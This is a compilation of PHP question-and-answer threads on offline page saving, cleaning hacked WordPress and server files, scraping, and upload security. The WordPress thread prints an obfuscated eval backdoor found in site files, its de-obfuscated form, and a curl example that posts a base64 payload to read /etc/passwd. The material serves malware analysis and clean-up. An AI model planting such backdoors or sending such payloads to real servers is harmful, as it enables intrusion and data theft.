PHP: read html file for offline reading

I am using the file_get_contents() function to read a URL, e.g.:
$html = file_get_contents('http://www.mydomain.com');
How do I modify the code above, or what else should I do, so that the pages can be read offline once they are saved in my DB? The problem is that the saved pages have images and CSS pointing to the fetched URL, which means the internet connection must be on to read them.
How can I save the images and CSS as well? I asked a similar question before regarding the MHT/MHTML format.

Is that what you're looking for?
http://www.phpclasses.org/package/1766-PHP-Build-MHT-MIME-archives-from-lists-of-files.html
http://www.wynia.org/wordpress/2006/12/making-mht-single-page-archive-files-with-php
Please note that MHT is an MS-specific format, so the above example uses Windows libraries.

One way to do this, which is potentially dangerous (you'll have to sanitize any inputs) but will certainly work if your server is a well-equipped Linux server, is to invoke the wget program with the right arguments using PHP's system function, like so:
system('wget --recursive --no-clobber --page-requisites '
    . '--html-extension --convert-links --no-parent '
    . escapeshellarg($url));
Once the files are downloaded, you can put them in the database, though I have to ask: what benefits does a database have over a file system for the purpose of storing files? Of course, I don't know your particular circumstances; I'm just raising the question in case you're making things more complicated than they need to be.
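For a single page, another option that avoids the shell entirely is to embed the images into the HTML as data: URIs before saving it. This is only a minimal sketch, assuming the DOM extension is available. inlineImages() and the $fetch callable are hypothetical names, not part of any library, and relative URLs and CSS files are not handled:

```php
<?php
// Hypothetical helper: rewrites every <img src> to a data: URI so the saved
// HTML renders without network access. $fetch is an assumed callable that
// takes a URL and returns [bytes, mimeType], or null on failure.
function inlineImages(string $html, callable $fetch): string
{
    $doc = new DOMDocument();
    // Real-world markup is rarely well formed, so silence parser warnings.
    $doc->loadHTML($html, LIBXML_NOERROR | LIBXML_NOWARNING);

    foreach ($doc->getElementsByTagName('img') as $img) {
        $src = $img->getAttribute('src');
        // Skip empty sources and images that are already inlined.
        if ($src === '' || strpos($src, 'data:') === 0) {
            continue;
        }
        $result = $fetch($src);
        if ($result === null) {
            continue; // leave the original URL in place if the download fails
        }
        [$bytes, $mime] = $result;
        $img->setAttribute('src', 'data:' . $mime . ';base64,' . base64_encode($bytes));
    }
    return $doc->saveHTML();
}

// One possible fetcher (an assumption): download with file_get_contents()
// and detect the MIME type from the bytes with the fileinfo extension.
$fetch = function (string $url): ?array {
    $bytes = @file_get_contents($url);
    if ($bytes === false) {
        return null;
    }
    return [$bytes, (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes)];
};
```

The returned string is a single self-contained document, so it can go into one DB column. Stylesheets would need the same treatment (for example replacing each link tag with an inline style element), which this sketch leaves out.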

Suspicious code found in my WordPress site - How to fix?

One of my sites was hacked last night and some pornographic content was placed on it.
What I have done:
I manually removed the adult content from the site using FTP.
My website is up now and working fine, but I can still find some code in my plugin and theme files that I did not write. The code is below:
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n842e1c'];
if(isset($s22))
{
eval($s21($s22));
}
?>
My questions are:
What does this code stand for, and what is it doing?
Is this harmful?
Should I remove this code from my files?
Will removing it have any effect on my site?
Other suggestions required:
This sort of code is present in 100+ files. Is there any method to remove the code from all files at once? Or any method to keep the code and just disinfect it, so that I don't have to remove it manually from so many files?

What does this code stand for, and what is it doing?
This code is a backdoor that an attacker can use to execute arbitrary code. De-obfuscated, it is equivalent to:
<?php
eval( base64_decode( $_POST['n842e1c'] ) );
An attacker can send a POST request to this file with an encoded payload in the POST parameter n842e1c and execute PHP code.
Example:
curl -X POST -d "n842e1c=ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs=" http://PATH_TO_THIS_FILE
Here, ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs= is the Base64-encoded form of echo readfile('/etc/passwd');.
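To see how the obfuscated snippet from the question reduces to that eval() line, the string lookups can be evaluated on their own, without running eval(). A small sketch; the variable names $function and $superglobal are mine, the index lists are copied from the question:

```php
<?php
// The lookup table used by the injected code.
$sF = "PCT4BA6ODSE_";

// Same index sequence as $s21 in the question: spells the function name.
$function = strtolower(
    $sF[4] . $sF[5] . $sF[9] . $sF[10] . $sF[6] . $sF[3] . $sF[11]
    . $sF[8] . $sF[10] . $sF[1] . $sF[7] . $sF[8] . $sF[10]
);

// Same index sequence as the ${...} expression: spells the superglobal name.
$superglobal = strtoupper($sF[11] . $sF[0] . $sF[7] . $sF[9] . $sF[2]);

echo $function, "\n";    // base64_decode
echo $superglobal, "\n"; // _POST
```

So $s21($s22) is base64_decode($_POST['n842e1c']), and the result is handed to eval().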
Is this harmful?
Yes
Should I remove this code from my files?
Yes
Will removing it have any effect on my site?
No
Here are some tips to help you clean the website. Also, follow the official WordPress post to take the necessary steps.

It's a backdoor that takes a POST parameter named n842e1c and executes it. The instruction is encoded as Base64.
It is.
You should, immediately.
Nothing; remove it ASAP.
Maybe reinstall WordPress, or you could quickly write a script in Python (or something else) to remove this string from your files.
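Such a clean-up script could also be written in PHP itself. The following is a rough sketch, not a tested disinfection tool. It assumes every injected block looks exactly like the one in the question (same $sF marker, same variable names, closed by a PHP closing tag); stripBackdoor() and cleanTree() are hypothetical names. Variants with different names will not match, so a reinstall from clean sources is still the safer route.

```php
<?php
// Assumption: the injected block always starts with this $sF marker and ends
// at the closing tag that follows the eval() call, as in the question.
const BACKDOOR_PATTERN =
    '/<\?php\s*\$sF="PCT4BA6ODSE_";.*?eval\(\$s21\(\$s22\)\);\s*\}\s*\?>/s';

// Returns the source with every matching block removed.
function stripBackdoor(string $source): string
{
    return preg_replace(BACKDOOR_PATTERN, '', $source) ?? $source;
}

// Walks $root recursively and returns the .php files that contain the block.
// With $dryRun = false the cleaned source is written back to each file.
function cleanTree(string $root, bool $dryRun = true): array
{
    $infected = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (!$file->isFile() || strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $path = $file->getPathname();
        $source = file_get_contents($path);
        $clean = stripBackdoor($source);
        if ($clean !== $source) {
            $infected[] = $path;
            if (!$dryRun) {
                file_put_contents($path, $clean);
            }
        }
    }
    return $infected;
}
```

Run it as a dry run first, e.g. print_r(cleanTree('/path/to/wordpress'));, review the list, and take a backup outside the web root before calling it with $dryRun set to false.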

PHP eval is dangerous.
It basically executes the code passed to it. So you must remove it if you are not sure of its use in your website.
The eval() language construct is very dangerous because it allows
execution of arbitrary PHP code. Its use thus is discouraged. If you
have carefully verified that there is no other option than to use this
construct, pay special attention not to pass any user provided data
into it without properly validating it beforehand.
Source
You cannot disable it directly, so the only choice is to remove the code from all the files.

Try installing these free plugins on your website:
Sucuri WordPress Auditing and Theme Authenticity Checker (TAC).
See the URLs below for some help.
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
http://www.wpbeginner.com/beginners-guide/beginners-step-step-guide-fixing-hacked-wordpress-site/

cURL PHP - load a full page

I am currently trying to load an HTML page via cURL. I can retrieve the HTML content, but part of it is loaded later via scripting (AJAX POST). I cannot retrieve that part of the HTML (it is a table).
Is it possible to load a page entirely?
Thank you for your answers

No, you cannot do this.
cURL does nothing more than download a file from a URL. It doesn't care whether it's HTML, JavaScript, an image, a spreadsheet, or any other arbitrary data; it just downloads. It doesn't run anything or parse anything or display anything, it just downloads.
You are asking for something more than that. You need to download, parse the result as HTML, then run some Javascript that downloads something else, then run more Javascript that parses that result into more HTML and inserts it into the original HTML.
What you're basically looking for is a full-blown web browser, not CURL.
Since your goal involves "running some Javascript code", it should be fairly clear that it is not achievable without having a Javascript interpreter available. This means that it is obviously not going to work inside of a PHP program (*). You're going to need to move beyond PHP. You're going to need a browser.
The solution I'd suggest is to use a very specialised browser called PhantomJS. This is actually a full Webkit browser, but without a user interface. It's specifically designed for automated testing of websites and other similar tasks. Your requirement fits it pretty well: write a script to get PhantomJS to open your URL, wait for the table to finish rendering, and grab the finished HTML code.
You'll need to install PhantomJS on your server, and then use a library like this one to control it from your PHP code.
I hope that helps.
(*) yes, I'm aware of the PHP extension that provides a JS interpreter inside of PHP, and it would provide a way to solve the problem, but it's experimental, unfinished, would be still difficult to implement as a solution, and I don't think it's a particularly good idea anyway, so let's not consider it for the purposes of this answer.

No, the only way you can do that is to make a separate cURL request to the URL that the AJAX call hits and put the two results together afterwards.
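That second request might look like the following sketch. The endpoint URL, the field names and the X-Requested-With header are assumptions; the real values have to be copied from the AJAX POST shown in the browser's network tab. fetchAjaxFragment() is a hypothetical helper name.

```php
<?php
// Sends the same POST the page's script would send and returns the response
// body (for example the HTML of the table).
function fetchAjaxFragment(string $endpoint, array $fields): string
{
    $ch = curl_init($endpoint);
    curl_setopt_array($ch, [
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => http_build_query($fields),
        CURLOPT_RETURNTRANSFER => true, // return the body instead of printing it
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_TIMEOUT        => 15,
        // Some servers only answer AJAX endpoints when this header is present.
        CURLOPT_HTTPHEADER     => ['X-Requested-With: XMLHttpRequest'],
    ]);
    $body = curl_exec($ch);
    if ($body === false) {
        throw new RuntimeException('AJAX request failed: ' . curl_error($ch));
    }
    return $body;
}

// Usage with made-up values:
// $table = fetchAjaxFragment('http://example.com/ajax/table.php', ['page' => 1]);
```

If the endpoint depends on a session, the cookies from the first page request have to be sent along as well (CURLOPT_COOKIEJAR and CURLOPT_COOKIEFILE).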

Virus file systems.php on my server?

I found a file systems.php on my webserver that neither I, as the user, nor my hosting provider placed there. I viewed the file; it only contains one preg_replace() statement with an extremely long $replacement part, which seems to be encoded somehow.
preg_replace("/.*/e","\x28\x65\...\x29\x29\x3B",".");
If I interpret this statement correctly, it would mean that basically everything is replaced by the $replacement part (which might be encrypted/encoded virus injection stuff).
I have uploaded the whole code as a pastebin here. Does someone have an idea how the code is encrypted and how it can be decrypted, so that I can assess the extent of the compromise of my server?
Update
This might be the attack vector:
So after some digging, we found that this script was planted using a vulnerability in the Uploadify jQuery library. The library's existence was discovered by the attacker through google. source

Unhexing the shellcode shows it's executing eval(gzinflate(base64_decode(huge string)));
I changed this eval to an echo and the full output is on pastebin here:
http://pastebin.com/t1iZ5LQ8
I haven't looked much further into this but it certainly seems dodgy. Just thought I'd do some of the legwork for anyone interested in looking at it further
EDIT
After a slightly more detailed look, it appears to allow an attacker to upload files to your server and take a dump of any databases on the box.
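The unwrapping can be scripted so that nothing is ever executed. A minimal sketch, assuming the payload has the eval(gzinflate(base64_decode('...'))) shape described above and that the zlib extension is loaded; decodeLayer() is a hypothetical helper name:

```php
<?php
// Decodes one gzinflate(base64_decode('...')) layer and returns the hidden
// source as a string, or null if the input does not have that shape.
// Nothing is passed to eval().
function decodeLayer(string $code): ?string
{
    $pattern = '~gzinflate\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=]+)[\'"]~';
    if (!preg_match($pattern, $code, $m)) {
        return null;
    }
    $raw = base64_decode($m[1], true);
    if ($raw === false) {
        return null;
    }
    $plain = @gzinflate($raw);
    return $plain === false ? null : $plain;
}

// The \xNN escapes from the preg_replace() call can be turned back into text
// with stripcslashes() when the file is read as plain data:
echo stripcslashes('\x28\x65'), "\n"; // (e
```

Malware is often wrapped several times, so the result of decodeLayer() may need to be fed back in until it returns null.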

It looks like shellcode, which can be disastrous for your server; shellcode executed by the CPU can give access to a shell, among other things.
For more information about shellcode, here's a good article:
http://www.vividmachines.com/shellcode/shellcode.html
This upload may point to an exploitable hole on your server that grants permission to upload or write data; check your logs to identify the problem.

page has two php files with identical names how to wget the correct php file? adding identifier?

I have this problem when I'm trying to use wget to retrieve the OUTPUT of a specific php script, but it looks like this site generates 2 identical PHP files.
The first one is smaller and the second one, in sequence, is the correct one. The problem is that every time I try the wget command, I end up with the smaller output file, which does not contain the desired info :(
Is there a way to download the correct file, using wget, by adding some sort of identifier to the link, to make sure I'm downloading the correct file.
Here is the command I've been trying:
$ wget http://www.fernsehen.to/index.php
If you run this and capture the traffic with Fiddler or Wireshark, you'll end up with two (2) "http://www.fernsehen.to/index.php" responses, and I need the bigger file of the two.
P.S. To manually get the desired output file, you can open http://www.fernsehen.to/index.php in Firefox or chrome and view source.
Thank you in advance!

What you want is not really practically possible. When you visit that page, they first generate a small file with a load of Javascript that detects browser features and sends them back to the server in a stateful manner in order to produce the exact code required for your browser, probably including things like supported video codecs. They probably also do some session fingerprinting for DRM purposes, to stop people like you from doing exactly what you're trying to do.
wget cannot emulate this behaviour because it is not a full browser: it cannot execute all that Javascript, and even if it could, it would not supply proper browser-like data. You'd have to write an extensive piece of custom code that exactly mimics everything the in-between page is doing to achieve the intended effect. Possible, but not easy, and most certainly not with a basic general-purpose tool like wget.

Is php fileinfo sufficient to prevent upload of malicious files?

I have searched around a bit, and have not really found a professional type response to how to have secure fileupload capability. So I wanted to get the opinion of some of the experts on this site. I am currently allowing upload of mp3s and images, and while I am pretty confident in preventing xss and injection attacks on my site, I am not really familiar with fileupload security. I basically just use php fileinfo and check an array of accepted filetypes against the filetype. For images, there is the getimagesize function and some additional checks. As far as storing them, I just have a folder within my directory, because I want the users to be able to use the files. If anyone could give me some tips I would really appreciate it.

I usually invoke ClamAV when accepting files that can be shared. With PHP, this is rather easily accomplished with php-clamav.
One of the last things you want to do is spread malware around the globe :)
If you can, do this in the background after a file is uploaded, but before making it public. A quirk with this class is that it can load the entire ClamAV virus definition database into memory, which will almost certainly stink if PHP is running under Apache conventionally (think on the order of +120 MB of memory per instance).
Using something like beanstalkd to scan uploads then update your DB to make them public is a very good way to work around this.
I mention this only because the other answers had not; in no way did I intend this to be a complete solution. See the other answers posted here; this is a step you should be finishing with. Always, always, always sanitize your input, make sure it's of the expected type, etc. (did I mention that you should read the other answers too?)

"malicious" files are not the only way to hurt your server (and if your site is down, it hurts your users).
For example, a possibility to hurt a server would be to upload a lot of very small files :
it would not use all the space on the disk,
but could use all available inodes...
...And when there is no free inode left, it's not possible to create any file anymore ; which, obviously, is bad.
After that, there are also problems like:
copyright
content that is not OK to you or your users (nudity?)
For that, there's not much you can do with technical solutions, but an "alert the moderator" feature is often helpful ;-)

No, because this could easily be spoofed. There's an article that describes how a server could be attacked by uploading a 1x1 "jpg file" and how to prevent it. Good read.

The first thing to do would be to disable execution of any server side code (e.g. PHP) in that directory via server configuration. Setting up a whitelist for MIME types (or file extensions, since your server uses those to figure out the mime type in the first place) and only allowing media files (not HTML or anything) will protect you from XSS injections. Those combined with a file type check should be quite sufficient - the only thing I can think of that might get through those are things that exploit image/audio decoders, and for spotting those you'd need something close to a virus scanner.

To start with the "file-type" ($_FILES['userfile']['type']) is completely meaningless. This is a variable in the HTTP post request that can be ANY VALUE the attacker wants. Remove this check ASAP.
getimagesize() is an excellent way to verify that an image is real. Sound files can be a bit more tricky; you could call file /tmp/temp_uploaded_file on the command line.
By far the most important part of an uploaded file is the file's extension. If the file is a .php, then you just got hacked. It gets worse: Apache can be configured to ignore the first file extension if it doesn't recognize it and then use the next extension, so this file would be executed as a normal .php file: backdoor.php.junk. By default this should be disabled, but it was enabled by default a few years ago.
You MUST MUST MUST use a file extension White List. So you want to force using files like: jpg,jpeg,gif,png,mp3 and reject it otherwise.
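A whitelist check along those lines could be sketched as follows. The extension list is the one above; pairing each extension with one expected MIME type, and the function names, are my assumptions. The MIME type is detected from the file contents with the fileinfo extension, never taken from $_FILES[...]['type'].

```php
<?php
// Whitelisted extensions and the MIME type expected for each (assumed pairing).
const ALLOWED_UPLOADS = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
    'png'  => 'image/png',
    'mp3'  => 'audio/mpeg',
];

// Returns the lowercased final extension if it is whitelisted, otherwise null.
function allowedExtension(string $originalName): ?string
{
    $ext = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
    return array_key_exists($ext, ALLOWED_UPLOADS) ? $ext : null;
}

// True only if the extension is whitelisted AND the detected content type
// matches what that extension should contain.
function isAllowedUpload(string $tmpPath, string $originalName): bool
{
    $ext = allowedExtension($originalName);
    if ($ext === null) {
        return false;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    return $mime === ALLOWED_UPLOADS[$ext];
}

// Random server-chosen file name, so the stored name can never contain a
// second extension such as ".php" supplied by the client.
function storedName(string $ext): string
{
    return bin2hex(random_bytes(16)) . '.' . $ext;
}
```

In an upload handler this would be called with $_FILES['userfile']['tmp_name'] and $_FILES['userfile']['name'] before move_uploaded_file(). Some MP3 files may be reported with a different MIME type than audio/mpeg, so the table may need extending after testing with real uploads.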

If exiv2 can't remove the metadata, the file is probably malicious or at least corrupted in some way. The following requires exiv2 to be installed on your Unix system. Unfortunately, this might be dangerous if the file contains malicious shell code. I'm not sure how sturdy exiv2 is against shell exploits, so use with caution. I haven't used it, but I've thought about using it.
function isFileMalicious($file)
{
    $out = [];
    $status = 0;
    // Ask exiv2 to strip the metadata; collect its output and exit code.
    exec('exiv2 rm ' . escapeshellarg($file) . ' 2>&1', $out, $status);
    // Any output or a non-zero exit code means exiv2 could not process the
    // file, which is treated here as "probably malicious or corrupted".
    return $status !== 0 || !empty($out);
}
